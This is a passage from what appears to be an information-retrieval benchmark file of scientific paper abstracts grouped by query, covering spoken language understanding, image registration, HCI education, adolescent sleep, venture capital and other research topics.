"text": "As the need for Human Computer Interaction (HCI) designers increases so does the need for courses that best prepare students for their future work life. Multidisciplinary teamwork is what very frequently meets the graduates in their new work situations. Preparing students for such multidisciplinary work through education is not easy to achieve. In this paper, we investigate ways to engage computer science students, majoring in design, use, and interaction (with technology), in design practices through an advanced graduate course in interaction design. Here, we take a closer look at how prior embodied and explicit knowledge of HCI that all of the students have, combined with understanding of design practice through the course, shape them as human-computer interaction designers. We evaluate the results of the effort in terms of increase in creativity, novelty of ideas, body language when engaged in design activities, and in terms of perceptions of how well this course prepared the students for the work practice outside of the university. Keywords—HCI education; interaction design; studio; design education; multidisciplinary teamwork.",
"title": ""
},
{
"docid": "b58055779111f5ae0b6cf5b70220b20e",
"text": "Screen media usage, sleep time and socio-demographic features are related to adolescents' academic performance, but interrelations are little explored. This paper describes these interrelations and behavioral profiles clustered in low and high academic performance. A nationally representative sample of 3,095 Spanish adolescents, aged 12 to 18, was surveyed on 15 variables linked to the purpose of the study. A Self-Organizing Maps analysis established non-linear interrelationships among these variables and identified behavior patterns in subsequent cluster analyses. Topological interrelationships established from the 15 emerging maps indicated that boys used more passive videogames and computers for playing than girls, who tended to use mobile phones to communicate with others. Adolescents with the highest academic performance were the youngest. They slept more and spent less time using sedentary screen media when compared to those with the lowest performance, and they also showed topological relationships with higher socioeconomic status adolescents. Cluster 1 grouped boys who spent more than 5.5 hours daily using sedentary screen media. Their academic performance was low and they slept an average of 8 hours daily. Cluster 2 gathered girls with an excellent academic performance, who slept nearly 9 hours per day, and devoted less time daily to sedentary screen media. Academic performance was directly related to sleep time and socioeconomic status, but inversely related to overall sedentary screen media usage. Profiles from the two clusters were strongly differentiated by gender, age, sedentary screen media usage, sleep time and academic achievement. Girls with the highest academic results had a medium socioeconomic status in Cluster 2. Findings may contribute to establishing recommendations about the timing and duration of screen media usage in adolescents and appropriate sleep time needed to successfully meet the demands of school academics and to improve interventions targeting to affect behavioral change.",
"title": ""
},
{
"docid": "eb0a907ad08990b0fe5e2374079cf395",
"text": "We examine whether tolerance for failure spurs corporate innovation based on a sample of venture capital (VC) backed IPO firms. We develop a novel measure of VC investors’ failure tolerance by examining their tendency to continue investing in a venture conditional on the venture not meeting milestones. We find that IPO firms backed by more failure-tolerant VC investors are significantly more innovative. A rich set of empirical tests shows that this result is not driven by the endogenous matching between failure-tolerant VCs and startups with high exante innovation potentials. Further, we find that the marginal impact of VC failure tolerance on startup innovation varies significantly in the cross section. Being financed by a failure-tolerant VC is much more important for ventures that are subject to high failure risk. Finally, we examine the determinants of the cross-sectional heterogeneity in VC failure tolerance. We find that both capital constraints and career concerns can negatively distort VC failure tolerance. We also show that younger and less experienced VCs are more exposed to these distortions, making them less failure tolerant than more established VCs.",
"title": ""
},
{
"docid": "7a3c965719e15d5afd6da28c12a78b01",
"text": "Prevalence of suicide attempts, self-injurious behaviors, and associated psychosocial factors were examined in a clinical sample of transgender (TG) adolescents and emerging adults (n = 96). Twenty-seven (30.3%) TG youth reported a history of at least one suicide attempt and 40 (41.8%) reported a history of self-injurious behaviors. There was a higher frequency of suicide attempts in TG youth with a desire for weight change, and more female-to-male youth reported a history of suicide attempts and self-harm behaviors than male-to-female youth. Findings indicate that this population is at a high risk for psychiatric comorbidities and life-threatening behaviors.",
"title": ""
},
{
"docid": "0d0c44dd4fd5b89edc29763ad038540b",
"text": "There is at present limited understanding of the neurobiological basis of the different processes underlying emotion perception. We have aimed to identify potential neural correlates of three processes suggested by appraisalist theories as important for emotion perception: 1) the identification of the emotional significance of a stimulus; 2) the production of an affective state in response to 1; and 3) the regulation of the affective state. In a critical review, we have examined findings from recent animal, human lesion, and functional neuroimaging studies. Findings from these studies indicate that these processes may be dependent upon the functioning of two neural systems: a ventral system, including the amygdala, insula, ventral striatum, and ventral regions of the anterior cingulate gyrus and prefrontal cortex, predominantly important for processes 1 and 2 and automatic regulation of emotional responses; and a dorsal system, including the hippocampus and dorsal regions of anterior cingulate gyrus and prefrontal cortex, predominantly important for process 3. We suggest that the extent to which a stimulus is identified as emotive and is associated with the production of an affective state may be dependent upon levels of activity within these two neural systems.",
"title": ""
}
] | scidocsrr |
fe79613a8551d3c9558768fd69a333f9 | Deep contextual language understanding in spoken dialogue systems | [
{
"docid": "1dd8fdb5f047e58f60c228e076aa8b66",
"text": "Recurrent Neural Network Language Models (RNN-LMs) have recently shown exceptional performance across a variety of applications. In this paper, we modify the architecture to perform Language Understanding, and advance the state-of-the-art for the widely used ATIS dataset. The core of our approach is to take words as input as in a standard RNN-LM, and then to predict slot labels rather than words on the output side. We present several variations that differ in the amount of word context that is used on the input side, and in the use of non-lexical features. Remarkably, our simplest model produces state-of-the-art results, and we advance state-of-the-art through the use of bagof-words, word embedding, named-entity, syntactic, and wordclass features. Analysis indicates that the superior performance is attributable to the task-specific word representations learned by the RNN.",
"title": ""
},
{
"docid": "ea200dc100d77d8c156743bede4a965b",
"text": "We present a contextual spoken language understanding (contextual SLU) method using Recurrent Neural Networks (RNNs). Previous work has shown that context information, specifically the previously estimated domain assignment, is helpful for domain identification. We further show that other context information such as the previously estimated intent and slot labels are useful for both intent classification and slot filling tasks in SLU. We propose a step-n-gram model to extract sentence-level features from RNNs, which extract sequential features. The step-n-gram model is used together with a stack of Convolution Networks for training domain/intent classification. Our method therefore exploits possible correlations among domain/intent classification and slot filling and incorporates context information from the past predictions of domain/intent and slots. The proposed method obtains new state-of-the-art results on ATIS and improved performances over baseline techniques such as conditional random fields (CRFs) on a large context-sensitive SLU dataset.",
"title": ""
},
{
"docid": "84f688155a92ed2196974d24b8e27134",
"text": "My sincere thanks to Donald Norman and David Rumelhart for their support of many years. I also wish to acknowledge the help of The views and conclusions contained in this document are those of the author and should not be interpreted as necessarily representing the official policies, either expressed or implied, of the sponsoring agencies. Approved for public release; distribution unlimited. Reproduction in whole or in part is permitted for any purpose of the United States Government Requests for reprints should be sent to the",
"title": ""
}
] | [
{
"docid": "1a101ae3faeaa775737799c2324ef603",
"text": "in recent years, greenhouse technology in agriculture is to automation, information technology direction with the IOT (internet of things) technology rapid development and wide application. In the paper, control networks and information networks integration of IOT technology has been studied based on the actual situation of agricultural production. Remote monitoring system with internet and wireless communications combined is proposed. At the same time, taking into account the system, information management system is designed. The collected data by the system provided for agricultural research facilities.",
"title": ""
},
{
"docid": "d3049fee1ed622515f5332bcfa3bdd7b",
"text": "PURPOSE\nTo prospectively analyze, using validated outcome measures, symptom improvement in patients with mild to moderate cubital tunnel syndrome treated with rigid night splinting and activity modifications.\n\n\nMETHODS\nNineteen patients (25 extremities) were enrolled prospectively between August 2009 and January 2011 following a diagnosis of idiopathic cubital tunnel syndrome. Patients were treated with activity modifications as well as a 3-month course of rigid night splinting maintaining 45° of elbow flexion. Treatment failure was defined as progression to operative management. Outcome measures included patient-reported splinting compliance as well as the Quick Disabilities of the Arm, Shoulder, and Hand questionnaire and the Short Form-12. Follow-up included a standardized physical examination. Subgroup analysis included an examination of the association between splinting success and ulnar nerve hypermobility.\n\n\nRESULTS\nTwenty-four of 25 extremities were available at mean follow-up of 2 years (range, 15-32 mo). Twenty-one of 24 (88%) extremities were successfully treated without surgery. We observed a high compliance rate with the splinting protocol during the 3-month treatment period. Quick Disabilities of the Arm, Shoulder, and Hand scores improved significantly from 29 to 11, Short Form-12 physical component summary score improved significantly from 45 to 54, and Short Form-12 mental component summary score improved significantly from 54 to 62. Average grip strength increased significantly from 32 kg to 35 kg, and ulnar nerve provocative testing resolved in 82% of patients available for follow-up examination.\n\n\nCONCLUSIONS\nRigid night splinting when combined with activity modification appears to be a successful, well-tolerated, and durable treatment modality in the management of cubital tunnel syndrome. We recommend that patients presenting with mild to moderate symptoms consider initial treatment with activity modification and rigid night splinting for 3 months based on a high likelihood of avoiding surgical intervention.\n\n\nTYPE OF STUDY/LEVEL OF EVIDENCE\nTherapeutic II.",
"title": ""
},
{
"docid": "4b2b4caa7dbf747833ff0f5f669ffa64",
"text": "This paper studies the use of everyday words to describe images. The common saying has it that 'a picture is worth a thousand words', here we ask which thousand? The proliferation of tagged social multimedia data presents a challenge to understanding collective tag-use at large scale -- one can ask if patterns from photo tags help understand tag-tag relations, and how it can be leveraged to improve visual search and recognition. We propose a new method to jointly analyze three distinct visual knowledge resources: Flickr, ImageNet/WordNet, and ConceptNet. This allows us to quantify the visual relevance of both tags learn their relationships. We propose a novel network estimation algorithm, Inverse Concept Rank, to infer incomplete tag relationships. We then design an algorithm for image annotation that takes into account both image and tag features. We analyze over 5 million photos with over 20,000 visual tags. The statistics from this collection leads to good results for image tagging, relationship estimation, and generalizing to unseen tags. This is a first step in analyzing picture tags and everyday semantic knowledge. Potential other applications include generating natural language descriptions of pictures, as well as validating and supplementing knowledge databases.",
"title": ""
},
{
"docid": "226882264b7582aeb1769ab49952fe37",
"text": "A novel method aimed at reducing radar cross section (RCS) under incident waves with both x- and y-polarizations, with the radiation characteristics of the antenna preserved, is presented and investigated. The goal is accomplished by the implementation of the polarization conversion metamaterial (PCM) and the principle of passive cancellation. As a test case, a microstrip patch antenna is simulated and experimentally measured to demonstrate the proposed strategy for dramatic radar cross section reduction (RCSR). Results exhibit that in-band RCSR is as much as 16 dB compared to the reference antenna. In addition, the PCM has a contribution to a maximum RCSR value of 14 dB out of the operating band. With significant RCSR and unobvious effect on the radiation performance of the antenna, the proposed method has a wide application for the design of other antennas with a requirement of RCS control.",
"title": ""
},
{
"docid": "efa566cdd4f5fa3cb12a775126377cb5",
"text": "This paper deals with the electromagnetic emissions of integrated circuits. In particular, four measurement techniques to evaluate integrated circuit conducted emissions are described in detail and they are employed for the measurement of the power supply conducted emission delivered by a simple integrated circuit composed of six synchronous switching drivers. Experimental results obtained by employing such measurement methods are presented and the influence of each test setup on the measured quantities is discussed.",
"title": ""
},
{
"docid": "9d3c4cef17b6736fa9c940051c642e29",
"text": "A zero-knowledge interactive proof is a protocol by which Alice can convince a polynomially-bounded Bob of the truth of some theorem without giving him any hint as to how the proof might proceed. Under cryptographic assumptions, we give a general technique for achieving this goal for every problem in NP. This extends to a presumably larger class, which combines the powers of non-determinism and randomness. Our protocol is powerful enough to allow Mice to convince Bob of theorems for which she does not even have a proof: it is enough for Alice to convince herself probabilistidly of a theorem, perhaps thanks to her knowledge of some trap-door information, in order for her to be able to convince Bob as well, without compromising the map-door in any way.",
"title": ""
},
{
"docid": "1b41ef1a81776e037b8b4c70f8a45f60",
"text": "The “interpretation” framework in Pattern Recognition (PR) arises in the many cases in which the more classical paradigm of “classification” is not properly applicable, generally because the number of classes is rather large, or simply because the concept of “class” does not hold. A very general way of representing the results of Interpretations of given objects or data is in terms of sentences of a “Semantic Language” in which the actions to be performed for each different object or datum are described. Interpretation can therefore be conveniently formalized through the concept of Formal Transduction, giving rise to the central PR problem of how to automatically learn a transducer from a training set of examples of the desired input-output behavior. This paper presents a formalization of the stated transducer learning problem, as well as an effective and efficient method for the inductive learning of an important class of transducers, namely, the class of Subsequential Tranducers. The capabilities of subsequential transductions are illustrated through a series of experiments which also show the high effectiveness of the proposed learning method to obtain very accurate and compact transducers for the corresponding tasks. * Work partially supported by the Spanish CICYT under grant TIC-0448/89 © IEEE Transactions on Pattern Analysis and Machine Intelligence, 15(5):448-458, 1993.",
"title": ""
},
{
"docid": "b637196c4627fd463ca54d0efeb87370",
"text": "Vision-based lane detection is a critical component of modern automotive active safety systems. Although a number of robust and accurate lane estimation (LE) algorithms have been proposed, computationally efficient systems that can be realized on embedded platforms have been less explored and addressed. This paper presents a framework that incorporates contextual cues for LE to further enhance the performance in terms of both computational efficiency and accuracy. The proposed context-aware LE framework considers the state of the ego vehicle, its surroundings, and the system-level requirements to adapt and scale the LE process resulting in substantial computational savings. This is accomplished by synergistically fusing data from multiple sensors along with the visual data to define the context around the ego vehicle. The context is then incorporated as an input to the LE process to scale it depending on the contextual requirements. A detailed evaluation of the proposed framework on real-world driving conditions shows that the dynamic and static configuration of the lane detection process results in computation savings as high as 90%, without compromising on the accuracy of LE.",
"title": ""
},
{
"docid": "dc8b19649f217d7fde46bb458d186923",
"text": "Sophisticated technology is increasingly replacing human minds to perform complicated tasks in domains ranging from medicine to education to transportation. We investigated an important theoretical determinant of people's willingness to trust such technology to perform competently—the extent to which a nonhuman agent is anthropomorphized with a humanlike mind—in a domain of practical importance, autonomous driving. Participants using a driving simulator drove either a normal car, an autonomous vehicle able to control steering and speed, or a comparable autonomous vehicle augmented with additional anthropomorphic features—name, gender, and voice. Behavioral, physiological, and self-report measures revealed that participants trusted that the vehicle would perform more competently as it acquired more anthropomorphic features. Technology appears better able to perform its intended design when it seems to have a humanlike mind. These results suggest meaningful consequences of humanizing technology, and also offer insights into the inverse process of objectifying humans. Word Count: 148 Anthropomorphism Increases Trust, 3 Technology is an increasingly common substitute for humanity. Sophisticated machines now perform tasks that once required a thoughtful human mind, from grading essays to diagnosing cancer to driving a car. As engineers overcome design barriers to creating such technology, important psychological barriers that users will face when using this technology emerge. Perhaps most important, will people be willing to trust competent technology to replace a human mind, such as a teacher’s mind when grading essays, or a doctor’s mind when diagnosing cancer, or their own mind when driving a car? Our research tests one important theoretical determinant of trust in any nonhuman agent: anthropomorphism (Waytz, Cacioppo, & Epley, 2010). Anthropomorphism is a process of inductive inference whereby people attribute to nonhumans distinctively human characteristics, particularly the capacity for rational thought (agency) and conscious feeling (experience; Gray, Gray, & Wegner, 2007). Philosophical definitions of personhood focus on these mental capacities as essential to being human (Dennett, 1978; Locke, 1841/1997). Furthermore, studies examining people’s lay theories of humanness show that people define humanness in terms of emotions that implicate higher order mental process such as self-awareness and memory (e.g., humiliation, nostalgia; Leyens et al., 2000) and traits that involve cognition and emotion (e.g., analytic, insecure; Haslam, 2006). Anthropomorphizing a nonhuman does not simply involve attributing superficial human characteristics (e.g., a humanlike face or body) to it, but rather attributing essential human characteristics to the agent (namely a humanlike mind, capable of thinking and feeling). Trust is a multifaceted concept that can refer to belief that another will behave with benevolence, integrity, predictability, or competence (McKnight & Chervany, 2001). Our prediction that anthropomorphism will increase trust centers on this last component of trust in another's competence (akin to confidence) (Siegrist, Earle, & Gutscher, 2003; Twyman, Harvey, & Harries, Anthropomorphism Increases Trust, 4 2008). 
Just as a patient would trust a thoughtful doctor to diagnose cancer more than a thoughtless one, or would rely on a mindful cab driver to navigate through rush hour traffic more than a mindless cab driver, this conceptualization of anthropomorphism predicts that people would trust easily anthropomorphized technology to perform its intended function more than seemingly mindless technology. An autonomous vehicle (one that drives itself), for instance, should seem better able to navigate through traffic when it seems able to think and sense its surroundings than when it seems to be simply mindless machinery. Or a “warbot” intended to kill should seem more lethal and sinister when it appears capable of thinking and planning than when it seems to be simply a computer mindlessly following an operator’s instructions. The more technology seems to have humanlike mental capacities, the more people should trust it to perform its intended function competently, regardless of the valence of its intended function (Epley, Caruso, & Bazerman, 2006; Pierce, Kilduff, Galinsky, & Sivanathan, 2013). This prediction builds on the common association between people’s perceptions of others’ mental states and of competent action. Because mindful agents appear capable of controlling their own actions, people judge others to be more responsible for successful actions they perform with conscious awareness, foresight, and planning (Cushman, 2008; Malle & Knobe, 1997) than for actions they perform mindlessly (see Alicke, 2000; Shaver, 1985; Weiner, 1995). Attributing a humanlike mind to a nonhuman agent should therefore make the agent seem better able to control its own actions, and therefore better able to perform its intended functions competently. Our prediction also advances existing research on the consequences of anthropomorphism by articulating the psychological processes by which anthropomorphism could affect trust in technology (Nass & Moon, 2000), and by both experimentally manipulating anthropomorphism as well as measuring it as a critical mediator. Some experiments have manipulated the humanlike appearance of robots and assessed measures indirectly related to trust. However, such studies have not measured whether such superficial manipulations actually increase the attribution of essential humanlike qualities to that agent (the attribution we predict is critical for trust in technology; Hancock, Billings, Schaeffer, Chen, & De Visser, 2011), and therefore cannot explain factors found ad hoc to moderate the apparent effect of anthropomorphism on trust (Pak, Fink, Price, Bass, & Sturre, 2012). Another study found that individual differences in anthropomorphism predicted differences in willingness to trust technology in hypothetical scenarios (Waytz et al., 2010), but did not manipulate anthropomorphism experimentally. Our experiment is therefore the first to test our theoretical model of how anthropomorphism affects trust in technology. We conducted our experiment in a domain of practical relevance: people’s willingness to trust an autonomous vehicle. Autonomous vehicles—cars that control their own steering and speed—are expected to account for 75% of vehicles on the road by 2040 (Newcomb, 2012). Employing these autonomous features means surrendering personal control of the vehicle and trusting technology to drive safely.
We manipulated the ease with which a vehicle, approximated by a driving simulator, could be anthropomorphized by merely giving it independent agency, or by also giving it a name, gender, and a human voice. We predicted that independent agency alone would make the car seem more mindful than a normal car, and that adding further anthropomorphic qualities would make the vehicle seem even more mindful. More important, we predicted that these relative increases in anthropomorphism would increase physiological, behavioral, and psychological measures of trust in the vehicle’s ability to drive effectively. Because anthropomorphism increases trust in the agent’s ability to perform its job, we also predicted that increased anthropomorphism of an autonomous agent would mitigate blame for an agent’s involvement in an undesirable outcome. To test this, we implemented a virtually unavoidable accident during the driving simulation in which participants were struck by an oncoming car, an accident clearly caused by the other driver. We implemented this to maintain experimental control over participants’ experience because everyone in the autonomous vehicle conditions would get into the same accident, one clearly caused by the other driver. Indeed, when two people are potentially responsible for an outcome, the agent seen to be more competent tends to be credited for a success whereas the agent seen to be less competent tends to be blamed for a failure (Beckman, 1970; Wetzel, 1972). Because we predicted that anthropomorphism would increase trust in the vehicle’s competence, we also predicted that it would reduce blame for an accident clearly caused by another vehicle. Experiment Method One hundred participants (52 female, Mage=26.39) completed this experiment using a National Advanced Driving Simulator. Once participants were in the simulator, the experimenter attached physiological equipment to them and randomly assigned them to condition: Normal, Agentic, or Anthropomorphic. Participants in the Normal condition drove the vehicle themselves, without autonomous features. Participants in the Agentic condition drove a vehicle capable of controlling its steering and speed (an “autonomous vehicle”). The experimenter followed a script describing the vehicle's features, suggesting when to use the autonomous features, and describing what was about to happen. Participants in the Anthropomorphic condition drove the same autonomous vehicle, but with additional anthropomorphic features beyond mere agency—the vehicle was referred to by name (Iris), was given a gender (female), and was given a voice through human audio files played at predetermined times throughout the course. The voice files followed the same script used by the experimenter in the Agentic condition, modified where necessary (See Supplemental Online Material [SOM]). All participants first completed a driving history questionnaire and a measure of dispositional anthropomorphism (Waytz et al., 2010). Scores on this measure did not vary significantly by condition, so we do not discuss them further. Participants in the Agentic and Anthropomorphic conditions then drove a short practice course to familiarize themselves with the car’s autonomous features. Participants coul",
"title": ""
},
{
"docid": "f1b48ea0f93578de8bbe083057211753",
"text": "Anecdotes from creative eminences suggest that executive control plays an important role in creativity, but scientific evidence is sparse. Invoking the Dual Pathway to Creativity Model, the authors hypothesize that working memory capacity (WMC) relates to creative performance because it enables persistent, focused, and systematic combining of elements and possibilities (persistence). Study 1 indeed showed that under cognitive load, participants performed worse on a creative insight task. Study 2 revealed positive associations between time-on-task and creativity among individuals high but not low in WMC, even after controlling for general intelligence. Study 3 revealed that across trials, semiprofessional cellists performed increasingly more creative improvisations when they had high rather than low WMC. Study 4 showed that WMC predicts original ideation because it allows persistent (rather than flexible) processing. The authors conclude that WMC benefits creativity because it enables the individual to maintain attention focused on the task and prevents undesirable mind wandering.",
"title": ""
},
{
"docid": "88f60c6835fed23e12c56fba618ff931",
"text": "Design of fault tolerant systems is a popular subject in flight control system design. In particular, adaptive control approach has been successful in recovering aircraft in a wide variety of different actuator/sensor failure scenarios. However, if the aircraft goes under a severe actuator failure, control system might not be able to adapt fast enough to changes in the dynamics, which would result in performance degradation or even loss of the aircraft. Inspired by the recent success of deep learning applications, this work builds a hybrid recurren-t/convolutional neural network model to estimate adaptation parameters for aircraft dynamics under actuator/engine faults. The model is trained offline from a database of different failure scenarios. In case of an actuator/engine failure, the model identifies adaptation parameters and feeds this information to the adaptive control system, which results in significantly faster convergence of the controller coefficients. Developed control system is implemented on a nonlinear 6-DOF F-16 aircraft, and the results show that the proposed architecture is especially beneficial in severe failure scenarios.",
"title": ""
},
{
"docid": "d7a1985750fe10273c27f7f8121640ac",
"text": "The large volumes of data that will be produced by ubiquitous sensors and meters in future smart distribution networks represent an opportunity for the use of data analytics to extract valuable knowledge and, thus, improve Distribution Network Operator (DNO) planning and operation tasks. Indeed, applications ranging from outage management to detection of non-technical losses to asset management can potentially benefit from data analytics. However, despite all the benefits, each application presents DNOs with diverse data requirements and the need to define an adequate approach. Consequently, it is critical to understand the different interactions among applications, monitoring infrastructure and approaches involved in the use of data analytics in distribution networks. To assist DNOs in the decision making process, this work presents some of the potential applications where data analytics are likely to improve distribution network performance and the corresponding challenges involved in its implementation.",
"title": ""
},
{
"docid": "eedcff8c2a499e644d1343b353b2a1b9",
"text": "We consider the problem of finding related tables in a large corpus of heterogenous tables. Detecting related tables provides users a powerful tool for enhancing their tables with additional data and enables effective reuse of available public data. Our first contribution is a framework that captures several types of relatedness, including tables that are candidates for joins and tables that are candidates for union. Our second contribution is a set of algorithms for detecting related tables that can be either unioned or joined. We describe a set of experiments that demonstrate that our algorithms produce highly related tables. We also show that we can often improve the results of table search by pulling up tables that are ranked much lower based on their relatedness to top-ranked tables. Finally, we describe how to scale up our algorithms and show the results of running it on a corpus of over a million tables extracted from Wikipedia.",
"title": ""
},
{
"docid": "6c2095e83fd7bc3b7bd5bd259d1ae9bb",
"text": "This paper basically deals with design of an IoT Smart Home System (IoTSHS) which can provide the remote control to smart home through mobile, infrared(IR) remote control as well as with PC/Laptop. The controller used to design the IoTSHS is WiFi based microcontroller. Temperature sensor is provided to indicate the room temperature and tell the user if it's needed to turn the AC ON or OFF. The designed IoTSHS need to be interfaced through switches or relays with the items under control through the power distribution box. When a signal is sent from IoTSHS, then the switches will connect or disconnect the item under control. The designed IoT smart home system can also provide remote controlling for the people who cannot use smart phone to control their appliances Thus, the designed IoTSHS can benefits the whole parts in the society by providing advanced remote controlling for the smart home. The designed IoTSHS is controlled through remote control which uses IR and WiFi. The IoTSHS is capable to connect to WiFi and have a web browser regardless to what kind of operating system it uses, to control the appliances. No application program is needed to purchase, download, or install. In WiFi controlling, the IoTSHS will give a secured Access Point (AP) with a particular service set identifier (SSID). The user will connect the device (e.g. mobile-phone or Laptop/PC) to this SSID with providing the password and then will open the browser and go to particular fixed link. This link will open an HTML web page which will allow the user to interface between the Mobile-Phone/Laptop/PC and the appliances. In addition, the IoTSHS may connect to the home router so that the user can control the appliances with keeping connection with home router. The proposed IoTSHS was designed, programmed, fabricated and tested with excellent results.",
"title": ""
},
{
"docid": "89aa13fe76bf48c982e44b03acb0dd3d",
"text": "Stock trading strategy plays a crucial role in investment companies. However, it is challenging to obtain optimal strategy in the complex and dynamic stock market. We explore the potential of deep reinforcement learning to optimize stock trading strategy and thus maximize investment return. 30 stocks are selected as our trading stocks and their daily prices are used as the training and trading market environment. We train a deep reinforcement learning agent and obtain an adaptive trading strategy. The agent’s performance is evaluated and compared with Dow Jones Industrial Average and the traditional min-variance portfolio allocation strategy. The proposed deep reinforcement learning approach is shown to outperform the two baselines in terms of both the Sharpe ratio and cumulative returns.",
"title": ""
},
{
"docid": "65110fa8d04aa6a4d4906020805fe7e7",
"text": "In this paper, an effective approach for the feature extraction of raw Electroencephalogram (EEG) signals by means of one-dimensional local binary pattern (1D-LBP) was presented. For the importance of making the right decision, the proposed method was performed to be able to get better features of the EEG signals. The proposed method was consisted of two stages: feature extraction by 1D-LBP and classification by classifier algorithms with features extracted. On the classification stage, the several machine learning methods were employed to uniform and non-uniform 1D-LBP features. The proposed method was also compared with other existing techniques in the literature to find out benchmark for an epileptic data set. The implementation results showed that the proposed technique could acquire high accuracy in classification of epileptic EEG signals. Also, the present paper is an attempt to develop a general-purpose feature extraction scheme, which can be utilized to extract features from different categories of EEG signals. 2014 Elsevier Inc. All rights reserved.",
"title": ""
},
{
"docid": "e3b87f15406ede861da6f0e7c0cfbf8c",
"text": "Recently, the web has rapidly emerged as a great source of financial information ranging from news articles to per- sonal opinions. Data mining and analysis of such financial information can aid stock market predictions. Traditional approaches have usually relied on predictions based on past performance of the stocks. In this paper, we introduce a novel way to do stock market prediction based on sentiments of web users. Our method involves scanning for financial message boards and extracting sentiments expressed by in- dividual authors. The system then learns the correlation between the sentiments and the stock values. The learned model can then be used to make future predictions about stock values. In our experiments, we show that our method is able to predict the sentiment with high precision and we also show that the stock performance and its recent web sentiments are also closely correlated.",
"title": ""
},
{
"docid": "a83fcfc62bdf0f58335e0853c006eaff",
"text": "Compressed sensing (CS) in magnetic resonance imaging (MRI) enables the reconstruction of MR images from highly undersampled k-spaces, and thus substantial reduction of data acquisition time. In this context, edge-preserving and sparsity-promoting regularizers are used to exploit the prior knowledge that MR images are sparse or compressible in a given transform domain and thus to regulate the solution space. In this study, we introduce a new regularization scheme by iterative linearization of the non-convex clipped absolute deviation (SCAD) function in an augmented Lagrangian framework. The performance of the proposed regularization, which turned out to be an iteratively weighted total variation (TV) regularization, was evaluated using 2D phantom simulations and 3D retrospective undersampling of clinical MRI data by different sampling trajectories. It was demonstrated that the proposed regularization technique substantially outperforms conventional TV regularization, especially at reduced sampling rates.",
"title": ""
},
{
"docid": "c68196f826f2afb61c13a0399d921421",
"text": "BACKGROUND\nIndividuals with mild cognitive impairment (MCI) have a substantially increased risk of developing dementia due to Alzheimer's disease (AD). In this study, we developed a multivariate prognostic model for predicting MCI-to-dementia progression at the individual patient level.\n\n\nMETHODS\nUsing baseline data from 259 MCI patients and a probabilistic, kernel-based pattern classification approach, we trained a classifier to distinguish between patients who progressed to AD-type dementia (n = 139) and those who did not (n = 120) during a three-year follow-up period. More than 750 variables across four data sources were considered as potential predictors of progression. These data sources included risk factors, cognitive and functional assessments, structural magnetic resonance imaging (MRI) data, and plasma proteomic data. Predictive utility was assessed using a rigorous cross-validation framework.\n\n\nRESULTS\nCognitive and functional markers were most predictive of progression, while plasma proteomic markers had limited predictive utility. The best performing model incorporated a combination of cognitive/functional markers and morphometric MRI measures and predicted progression with 80% accuracy (83% sensitivity, 76% specificity, AUC = 0.87). Predictors of progression included scores on the Alzheimer's Disease Assessment Scale, Rey Auditory Verbal Learning Test, and Functional Activities Questionnaire, as well as volume/cortical thickness of three brain regions (left hippocampus, middle temporal gyrus, and inferior parietal cortex). Calibration analysis revealed that the model is capable of generating probabilistic predictions that reliably reflect the actual risk of progression. Finally, we found that the predictive accuracy of the model varied with patient demographic, genetic, and clinical characteristics and could be further improved by taking into account the confidence of the predictions.\n\n\nCONCLUSIONS\nWe developed an accurate prognostic model for predicting MCI-to-dementia progression over a three-year period. The model utilizes widely available, cost-effective, non-invasive markers and can be used to improve patient selection in clinical trials and identify high-risk MCI patients for early treatment.",
"title": ""
},
{
"docid": "e57f85949378039249f36999c5f9b76e",
"text": "A good dialogue agent should have the ability to interact with users by both responding to questions and by asking questions, and importantly to learn from both types of interaction. In this work, we explore this direction by designing a simulator and a set of synthetic tasks in the movie domain that allow such interactions between a learner and a teacher. We investigate how a learner can benefit from asking questions in both offline and online reinforcement learning settings, and demonstrate that the learner improves when asking questions. Finally, real experiments with Mechanical Turk validate the approach. Our work represents a first step in developing such end-to-end learned interactive dialogue agents.",
"title": ""
}
] | scidocsrr |
8a702f828c04eb84995f90f525222b00 | Multiscale image registration. | [
{
"docid": "fd5a586adf75dfc33171e077ecd039bb",
"text": "An overview is presented of the medical image processing literature on mutual-information-based registration. The aim of the survey is threefold: an introduction for those new to the field, an overview for those working in the field, and a reference for those searching for literature on a specific application. Methods are classified according to the different aspects of mutual-information-based registration. The main division is in aspects of the methodology and of the application. The part on methodology describes choices made on facets such as preprocessing of images, gray value interpolation, optimization, adaptations to the mutual information measure, and different types of geometrical transformations. The part on applications is a reference of the literature available on different modalities, on interpatient registration and on different anatomical objects. Comparison studies including mutual information are also considered. The paper starts with a description of entropy and mutual information and it closes with a discussion on past achievements and some future challenges.",
"title": ""
},
{
"docid": "607797e37b056dab866d175767343353",
"text": "We propose a new method for the intermodal registration of images using a criterion known as mutual information. Our main contribution is an optimizer that we specifically designed for this criterion. We show that this new optimizer is well adapted to a multiresolution approach because it typically converges in fewer criterion evaluations than other optimizers. We have built a multiresolution image pyramid, along with an interpolation process, an optimizer, and the criterion itself, around the unifying concept of spline-processing. This ensures coherence in the way we model data and yields good performance. We have tested our approach in a variety of experimental conditions and report excellent results. We claim an accuracy of about a hundredth of a pixel under ideal conditions. We are also robust since the accuracy is still about a tenth of a pixel under very noisy conditions. In addition, a blind evaluation of our results compares very favorably to the work of several other researchers.",
"title": ""
}
] | [
{
"docid": "f69723ed73c7edd9856883bbb086ed0c",
"text": "An algorithm for license plate recognition (LPR) applied to the intelligent transportation system is proposed on the basis of a novel shadow removal technique and character recognition algorithms. This paper has two major contributions. One contribution is a new binary method, i.e., the shadow removal method, which is based on the improved Bernsen algorithm combined with the Gaussian filter. Our second contribution is a character recognition algorithm known as support vector machine (SVM) integration. In SVM integration, character features are extracted from the elastic mesh, and the entire address character string is taken as the object of study, as opposed to a single character. This paper also presents improved techniques for image tilt correction and image gray enhancement. Our algorithm is robust to the variance of illumination, view angle, position, size, and color of the license plates when working in a complex environment. The algorithm was tested with 9026 images, such as natural-scene vehicle images using different backgrounds and ambient illumination particularly for low-resolution images. The license plates were properly located and segmented as 97.16% and 98.34%, respectively. The optical character recognition system is the SVM integration with different character features, whose performance for numerals, Kana, and address recognition reached 99.5%, 98.6%, and 97.8%, respectively. Combining the preceding tests, the overall performance of success for the license plate achieves 93.54% when the system is used for LPR in various complex conditions.",
"title": ""
},
{
"docid": "f321a48e23e58c3200ce6c413f98c709",
